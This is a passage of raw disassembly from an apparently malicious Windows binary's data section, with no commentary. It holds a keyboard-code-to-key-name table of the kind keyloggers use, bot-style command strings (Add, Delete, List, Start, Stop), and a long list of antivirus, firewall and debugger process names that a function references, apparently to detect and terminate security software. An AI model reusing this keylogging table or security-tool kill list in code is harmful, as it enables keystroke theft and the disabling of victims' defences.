dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_42ECCC dd 38h, 38000000h, 2 dup(0) dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 3 dup(0)
off_42ED08 dd offset aAdd ; DATA XREF: sub_4082A9+59�r
; sub_408321+4A�r ...
; "Add"
off_42ED0C dd offset aAdded ; DATA XREF: sub_4082A9+2D�r
; sub_408321+7C�r ...
; "Added"
dword_42ED10 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
dd 0
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 4246D0h, 4246C8h, 2, 4246BCh, 4246B0h, 3, 0
dword_42ED60 dd 7530h align 8
off_42ED68 dd offset aAckwin32_exe ; DATA XREF: sub_408D07:loc_408DCE�r
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe_0 ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
